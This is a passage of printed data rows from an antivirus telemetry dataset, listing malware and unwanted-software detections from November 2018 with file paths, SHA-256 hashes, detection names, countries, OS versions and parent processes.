  Row(detection=Row(filename='ieudinit.exe', filepath='l:\\d1c4fc7951a621914ee9\\ieudinit.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='8034856a544bc3051539e4fb16adda187e189f6078036d57bb167d339035e5dc', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:39:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nskA549.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-02T16:19:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='deletedoctor.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\DeleteDoctor.exe", filesize=64000, name='BDS/Rogue.766002.#M1.#R1'), hash='c52dabe8d138d077358065c61a91b37e1ec4311e69e5b26e8f950f5d25c0c474', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:16:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='zemax.exe', filepath='C:\\Users\\X\\Desktop\\ZEMAX.13\\ZEMAX 13 Release 2 SP4 PREMIUM - 64 Bit\\Crack\\zemax.exe', filesize=17536000, name='W32/Infector.Gen8.#M300.#R700734'), hash='ff573d5ea1cd7a2912ddc3892e1a23c4ddeac81ae1525b27f0f6216155c86646', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:ytbwbHiWXkKW8sYD.1', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T11:46:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-154706-94a3dd41', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_37ab9678\\AVSCAN-20181102-154649-92826A7C\\AVSCAN-20181102-154706-94A3DD41', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:46:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='simplewallet.exe', filepath='z:\\blockchains\\aeon\\aeon\\simplewallet.exe', filesize=3712000, name='PUA/CoinMiner.#M1.#R1'), hash='e3af5ef7160571fadb565100b4239189d898c85210ea8dd8135ba5f95c69123d', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:39:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110815-c9bbe6f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6ecee166\\AVSCAN-20181102-110735-C33353C8\\AVSCAN-20181102-110815-C9BBE6F6', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-191111-6c0ebcd0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_93587807\\AVSCAN-20181102-191054-694EDC2E\\AVSCAN-20181102-191111-6C0EBCD0', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:11:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='dc86dd6c1b8d4af8cb1d2d250a3c78d9d21d5314f73bd753e4778c47942c098f', metadata=Row(cmdline='\\\\\\/Embedding', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-02T21:24:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='clipgrab-3.6.8-cgorg.exe', filepath='F:\\clipgrab-3.6.8-cgorg.exe', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-02T13:44:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='! my image.scr', filepath='E:\\! My Image.scr', filesize=0, name='DR/Patched.Ren.Gen.#M1.#R1'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:50:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='new po urgently.exe', filepath='c:\\users\\X\\downloads\\02112018_13\\new po urgently.exe', filesize=584000, name='TR/Dropper.VB.b60a2d.#M1.#R1'), hash='b60a2df189b459696768ff978799e748c5b043d1a97652589239b42c76cc2af6', metadata=Row(cmdline=None, country='EE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T20:17:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2501368, timestamp='2018-11-02T01:53:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-065155-a5743820', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-234137-7F763213\\AVSCAN-20181102-065155-A5743820', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T03:59:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='icaredatarecovery.exe', filepath='\\\\10.255.111.86\\d$\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\iCareDataRecovery.exe', filesize=64000, name='TR/Siggen.64000.9.#M1.#R1'), hash='c1861cb3e5d8193ebcc61ccee37d797fd13700ea8ad6080c5d62696233d914b6', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T06:30:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00295029', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00295029', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:55:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-142100-c7059077', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-142100-C7059077', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:21:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290997', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290997', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:37:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210318-a99908f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5eeaa1a7\\AVSCAN-20181104-210102-9079F3F1\\AVSCAN-20181104-210318-A99908F3', filesize=8484000, name='WORM/Lodbak.Gen.#M1.#R1'), hash='dbd63ed5cbbf2133c2acc4c8d07ca6dfc3af4c049a08be1886ec9c9f9c988fad', metadata=Row(cmdline=None, country='AL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:04:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='eb60460fbc534f7854a7b0b6c43560b1557ef302fdd6234df3cb48ed855b80a6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\EB60460FBC534F7854A7B0B6C43560B1557EF302FDD6234DF3CB48ED855B80A6', filesize=768000, name='PUA/SoftPulse.aone.#M1.#R1'), hash='eb60460fbc534f7854a7b0b6c43560b1557ef302fdd6234df3cb48ed855b80a6', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T13:00:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023a45a', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023a45a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:56:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00295830', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00295830', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:03:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023dc93', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023dc93', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:52:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (5).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (5).exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='cac04bd9f620e52722910d4cb065245cdd766dce4430e4ccaf0691bc35bab5bf', metadata=Row(cmdline='\\\\\\/FromInstall', country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Auslogics\\Anti-Malware\\AntiMalware.exe', parentsize=1906248, timestamp='2018-11-04T18:58:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered rinit', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered rinit', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='b291d04a513b0ba38ef40083d66fc8ef5ca7e686c9d27100ec812d5f5223cb24', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T01:31:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151417-a474482b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_165c595c\\AVSCAN-20181104-151319-98EBD4CB\\AVSCAN-20181104-151417-A474482B', filesize=128000, name='TR/Crypt.ZPACK.Gen.#M1.#R1'), hash='f944b967950e2a63ae409719695c20f479ac847d801faab7805e0b867f7a6781', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:14:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='libegl.dll', filepath='C:\\Program Files (x86)\\chroomium Browser\\chroomium\\libegl.dll', filesize=80000, name='TR/Ghokswa.jlssq.#M1.#R1'), hash='fa0ef7cb9d547661d7f48dca8bd1d69c570339caf685aeb3a79b29356344437e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe16_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe16 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T11:35:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:38:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:01:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-233225-416dd9e0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0ba9276c\\AVSCAN-20181104-233155-3D79838C\\AVSCAN-20181104-233225-416DD9E0', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T22:32:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='D:\\01 Instaladores\\Isos\\Combo\\autorun.exe', filesize=6912000, name='TR/Patched.Ren.Gen.#M300.#R3369'), hash='f244cb6d23dfeedc852ac1aafb17405eca59d5612677e2944ac76d296c408cc2', metadata=Row(cmdline=None, country='CU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2501368, timestamp='2018-11-01T14:49:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:44:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f8c9945870f286a27b08f748783c0cab00d53822d7ae75b017c041219439a3be', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\F8C9945870F286A27B08F748783C0CAB00D53822D7AE75B017C041219439A3BE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f8c9945870f286a27b08f748783c0cab00d53822d7ae75b017c041219439a3be', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:49:45Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T23:42:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xupobmmfb.exe', filepath='C:\\Program Files\\T9ZMWGI9OS\\XUPOBMMFB.exe', filesize=768000, name='TR/Dropper.Gen.#M300.#R4133'), hash='01b70e2e06a50fee1d5ce045d53f60d475ee26f638bfdbd3d3015f8cdba2b6e7', metadata=Row(cmdline=None, country='ET', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:25:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1172221\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T21:50:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:15:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:11:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='droplet template.exe', filepath='C:\\Program Files\\Adobe\\Adobe Photoshop CS2\\Required\\Droplet Template.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='0b04977e527ef87bf35911463cf918654ac138a82ceab2aa497f64816c8eac09', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:zaQyKqDA70uNGHBy.1', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=126096, timestamp='2018-11-02T02:46:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='initwain.exe', filepath='C:\\Program Files (x86)\\Nuance\\PaperPort\\initwain.exe', filesize=116000, name='W32/Sality.AT.#M1.#R1'), hash='3d53931f1402e34996fee1c43dc6424521d912037ec0ac0c37f24647c4212cd2', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:0NU7deI9ckOKuNTJ.1', country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T01:49:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:49:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='datamngrui.exe', filepath='C:\\Program Files\\Movies Toolbar\\Datamngr\\DatamngrUI.exe', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='494a88016582ae557b75ec848e12d6646e459779691bacea54d7ff9b246aa70c', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:39:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:09:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dragunov.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\AMMO\\DRAGUNOV\\DRAGUNOV.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='patch.exe', filepath='g:\\برامج\\net program\\idm\\myegy.com.idm6.18 build 9.fouady\\new.p\\باتشات قديمة\\Patch.exe', filesize=448000, name='W32/Sality.AT.#M1.#R1'), hash='5dab6ae3ce6cdb4b7ead645fd2e27a0707311e84276855d8a560c0a45793b2b8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:56:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155843-e4f34ffc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155843-E4F34FFC', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:58:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dsp3.exe', filepath='F:\\大戰略 PERFECT 3.0\\DSP3.EXE', filesize=2048000, name='W32/Almanahe.C.#M1.#R1'), hash='6d72a116be57c06d272d643fa65661a8173d7c515d29436351b7a9b331c722ed', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T02:13:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1172221\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T21:51:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-084254-69fec99a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c2137dec\\AVSCAN-20181102-084107-5A79590B\\AVSCAN-20181102-084254-69FEC99A', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:42:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ppj2dd.exe', filepath='\\?\\N:\\Game_Coll\\الشرطة\\PPJ2DD.EXE', filesize=1024000, name='HEUR/APC.#M1.#R1'), hash='0333f7f74d900b0c01d40f3b7accc9b05d119a0a4bf29382ff6e20d63f30a652', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:55:24Z'), dt=datetime.date(2018, 11, 2)),
